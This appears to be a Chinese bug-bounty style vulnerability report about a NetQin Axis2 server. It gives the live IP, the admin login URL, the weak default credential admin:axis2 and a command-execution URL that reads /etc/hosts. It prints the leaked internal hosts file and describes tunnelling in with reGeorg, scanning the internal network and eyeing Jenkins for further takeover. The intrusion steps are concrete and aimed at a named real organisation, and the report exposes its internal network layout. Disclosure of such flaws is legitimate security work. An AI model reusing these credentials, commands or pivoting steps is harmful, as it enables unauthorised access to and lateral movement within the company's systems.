漏洞详情 纯属偶遇,由Axis2的弱口令导致getshell,然后内网漫游了一下
http://211.151.59.27:80/axis2/axis2-admin/login
admin:axis2
漏洞证明: getshell
http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts
通过hosts可以看到是网秦的服务
HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014# HEADER: by puppet. While it can still be managed manually, it# HEADER: is definitely not recommended.# Do not remove the following line, or various programs# that require network functionality will fail.127.0.0.1 localhost.localdomain localhost BJ-YZ-S-ST040::1 localhost6.localdomain6 localhost6127.0.0.1 oversea192.168.3.46 bjyz.puppet.nq.com192.168.0.41 a03 pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com192.168.0.217 a12 app.netqin.com211.151.59.71 a09 blyt.netqin.com192.168.0.143 a08 i.netqin.com i.nq.com m.nq.com192.168.5.212 a13 c.cpsserver.cns192.168.0.148 a05 nqses.nq.com192.168.3.35 a11 pay.netqin.com pay.nq.com192.168.3.53 a07 my.netqin.com192.168.3.52 a06 mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com192.168.5.216 a15 dbapp.nq.com192.168.5.207 a16 dbboss.nq.com192.168.5.218 a14 dbuis.nq.com
拿到shell了,reGeorg开个代理进内网
namp扫了一下内网网段,内网比较大
设计大量内部系统,wiki,jenkins,jira,内部管理系统,会议室预定系统,报表管理系统等等,以及大量开发测试文档
程序员千行bug率….
jenkins 又可以搞下好多机器了
可申请点卡..
